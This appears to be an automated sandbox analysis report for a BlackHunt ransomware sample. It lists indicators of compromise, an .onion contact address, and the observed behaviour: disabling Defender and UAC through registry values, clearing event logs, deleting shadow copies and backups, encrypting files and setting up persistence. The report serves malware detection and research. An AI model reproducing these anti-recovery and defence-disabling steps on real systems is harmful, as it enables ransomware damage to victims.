Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:30
Static task
static1
Behavioral task
behavioral1
Sample
ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Resource
win10v2004-20231215-en
General
-
Target
ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
-
Size
707KB
-
MD5
8c0b6e4647e4efbbd4e6fdce74ad2392
-
SHA1
022e01980b0eb0de51cca2ec1b61561deb0247a1
-
SHA256
ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee
-
SHA512
89ad0d92867d32b85256498c7c6d0278a65d19b909a750a8aed29ea019bb1bff2e11b54b4fc6817290a5a0c1df41c4e83e5fc693e6c5c44dceb2c3261a871752
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza148ovnh:6uaTmkZJ+naie5OTamgEoKxLWTWh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2536 fsutil.exe 996 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3024 wevtutil.exe 920 wevtutil.exe 2792 wevtutil.exe 1784 wevtutil.exe 224 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3016 bcdedit.exe 2508 bcdedit.exe 2804 bcdedit.exe 2824 bcdedit.exe -
Renames multiple (2887) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2924 wbadmin.exe 2932 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1636 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\O: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\L: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\T: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\X: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\E: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\U: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\H: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\J: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\N: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\G: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\V: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\B: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\M: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\F: wevtutil.exe File opened (read-only) \??\I: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\P: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\A: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\K: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\W: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\S: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened (read-only) \??\Z: ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.txt ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\locale\or\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_ReadMe.txt ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_ReadMe.txt ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.txt ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_ReadMe.txt ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files (x86)\Google\Update\Install\{1187FFC4-7B4C-4060-83CA-88C53EC9AD16}\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#BlackHunt_ReadMe.hta ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_ReadMe.hta ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_Private.key ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2452 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1668 vssadmin.exe 920 vssadmin.exe 2356 vssadmin.exe 1940 vssadmin.exe 800 vssadmin.exe 2384 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2632 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2548 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 872 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeRestorePrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeBackupPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeTakeOwnershipPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeAuditPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeSecurityPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeIncBasePriorityPrivilege 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe Token: SeBackupPrivilege 700 vssvc.exe Token: SeRestorePrivilege 700 vssvc.exe Token: SeAuditPrivilege 700 vssvc.exe Token: SeBackupPrivilege 2720 wbengine.exe Token: SeRestorePrivilege 2720 wbengine.exe Token: SeSecurityPrivilege 2720 wbengine.exe Token: SeSecurityPrivilege 920 wevtutil.exe Token: SeSecurityPrivilege 2792 wevtutil.exe Token: SeBackupPrivilege 920 wevtutil.exe Token: SeBackupPrivilege 2792 wevtutil.exe Token: SeSecurityPrivilege 224 wevtutil.exe Token: SeSecurityPrivilege 1784 wevtutil.exe Token: SeBackupPrivilege 224 wevtutil.exe Token: SeBackupPrivilege 1784 wevtutil.exe Token: SeSecurityPrivilege 3024 wevtutil.exe Token: SeBackupPrivilege 3024 wevtutil.exe Token: SeDebugPrivilege 2632 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2156 wrote to memory of 1100 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 29 PID 2156 wrote to memory of 1100 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 29 PID 2156 wrote to memory of 1100 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 29 PID 2156 wrote to memory of 1100 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 29 PID 2156 wrote to memory of 2572 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 31 PID 2156 wrote to memory of 2572 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 31 PID 2156 wrote to memory of 2572 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 31 PID 2156 wrote to memory of 2572 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 31 PID 2156 wrote to memory of 2588 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 33 PID 2156 wrote to memory of 2588 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 33 PID 2156 wrote to memory of 2588 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 33 PID 2156 wrote to memory of 2588 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 33 PID 2156 wrote to memory of 2664 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 35 PID 2156 wrote to memory of 2664 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 35 PID 2156 wrote to memory of 2664 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 35 PID 2156 wrote to memory of 2664 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 35 PID 1100 wrote to memory of 2676 1100 cmd.exe 39 PID 1100 wrote to memory of 2676 1100 cmd.exe 39 PID 1100 wrote to memory of 2676 1100 cmd.exe 39 PID 2156 wrote to memory of 2708 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 37 PID 2156 wrote to memory of 2708 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 37 PID 2156 wrote to memory of 2708 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 37 PID 2156 wrote to memory of 2708 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 37 PID 2156 wrote to memory of 2604 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 41 PID 2156 wrote to memory of 2604 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 41 PID 2156 wrote to memory of 2604 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 41 PID 2156 wrote to memory of 2604 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 41 PID 2156 wrote to memory of 2304 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 52 PID 2156 wrote to memory of 2304 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 52 PID 2156 wrote to memory of 2304 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 52 PID 2156 wrote to memory of 2304 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 52 PID 2572 wrote to memory of 2736 2572 cmd.exe 42 PID 2572 wrote to memory of 2736 2572 cmd.exe 42 PID 2572 wrote to memory of 2736 2572 cmd.exe 42 PID 2588 wrote to memory of 2596 2588 cmd.exe 43 PID 2588 wrote to memory of 2596 2588 cmd.exe 43 PID 2588 wrote to memory of 2596 2588 cmd.exe 43 PID 2156 wrote to memory of 868 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 50 PID 2156 wrote to memory of 868 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 50 PID 2156 wrote to memory of 868 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 50 PID 2156 wrote to memory of 868 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 50 PID 2156 wrote to memory of 2716 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 45 PID 2156 wrote to memory of 2716 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 45 PID 2156 wrote to memory of 2716 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 45 PID 2156 wrote to memory of 2716 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 45 PID 2156 wrote to memory of 1668 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 92 PID 2156 wrote to memory of 1668 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 92 PID 2156 wrote to memory of 1668 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 92 PID 2156 wrote to memory of 1668 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 92 PID 2156 wrote to memory of 2644 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 51 PID 2156 wrote to memory of 2644 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 51 PID 2156 wrote to memory of 2644 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 51 PID 2156 wrote to memory of 2644 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 51 PID 2156 wrote to memory of 1956 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 53 PID 2156 wrote to memory of 1956 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 53 PID 2156 wrote to memory of 1956 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 53 PID 2156 wrote to memory of 1956 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 53 PID 2156 wrote to memory of 2488 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 148 PID 2156 wrote to memory of 2488 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 148 PID 2156 wrote to memory of 2488 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 148 PID 2156 wrote to memory of 2488 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 148 PID 2156 wrote to memory of 2556 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 147 PID 2156 wrote to memory of 2556 2156 ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe 147 